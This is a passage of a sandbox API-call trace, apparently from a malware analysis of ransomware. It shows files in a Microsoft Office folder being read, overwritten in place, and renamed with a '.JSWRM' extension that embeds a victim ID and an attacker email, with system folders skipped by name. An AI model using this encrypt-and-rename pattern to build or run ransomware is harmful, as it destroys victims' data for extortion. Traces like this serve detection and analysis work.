(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0116.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0116.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0116.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0116.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0116.183] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa2f6cec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa2f6cec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa31ce71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="POWERPNT_COL.HXC", cAlternateFileName="POWERP~1.HXC")) returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2=".") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="..") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="...") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="windows") returned -1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="recovery") returned -1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="perflogs") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="documents and settings") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="system volume information") returned -1 [0116.183] lstrcmpiW (lpString1="POWERPNT_COL.HXC", lpString2="msocache") returned 1 [0116.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXC", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0116.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXC", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_COL.HXC", lpUsedDefaultChar=0x0) returned 16 [0116.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXC", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0116.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXC", cchWideChar=16, lpMultiByteStr=0x241038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_COL.HXC", lpUsedDefaultChar=0x0) returned 16 [0116.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0116.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.185] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=636) returned 1 [0116.185] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0116.185] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0116.188] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.188] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0116.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0116.188] CloseHandle (hObject=0x238) returned 1 [0116.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0116.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0116.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0116.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0116.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0116.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.190] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0116.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0116.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0116.191] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa2f6cec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa2f6cec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa31ce71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="POWERPNT_COL.HXT", cAlternateFileName="POWERP~1.HXT")) returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2=".") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="..") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="...") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="windows") returned -1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="recovery") returned -1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="perflogs") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="documents and settings") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="system volume information") returned -1 [0116.191] lstrcmpiW (lpString1="POWERPNT_COL.HXT", lpString2="msocache") returned 1 [0116.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0116.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXT", cchWideChar=16, lpMultiByteStr=0x2411f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_COL.HXT", lpUsedDefaultChar=0x0) returned 16 [0116.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0116.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_COL.HXT", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_COL.HXT", lpUsedDefaultChar=0x0) returned 16 [0116.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0116.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0116.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.192] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=208) returned 1 [0116.192] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0116.193] ReadFile (in: hFile=0x238, lpBuffer=0x22f1b0, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22f1b0*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0116.193] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.193] WriteFile (in: hFile=0x238, lpBuffer=0x22f1b0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22f1b0*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0116.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0116.194] CloseHandle (hObject=0x238) returned 1 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0116.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0116.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0116.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0116.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0116.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0116.195] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa2f6cec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa2f6cec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa31ce71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="POWERPNT_F_COL.HXK", cAlternateFileName="POWERP~1.HXK")) returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2=".") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="..") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="...") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="windows") returned -1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="recovery") returned -1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="perflogs") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="documents and settings") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="system volume information") returned -1 [0116.195] lstrcmpiW (lpString1="POWERPNT_F_COL.HXK", lpString2="msocache") returned 1 [0116.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_F_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0116.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0116.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_F_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0116.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.197] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0116.197] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0116.197] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0116.198] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.198] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0116.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0116.198] CloseHandle (hObject=0x238) returned 1 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0116.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0116.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0116.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 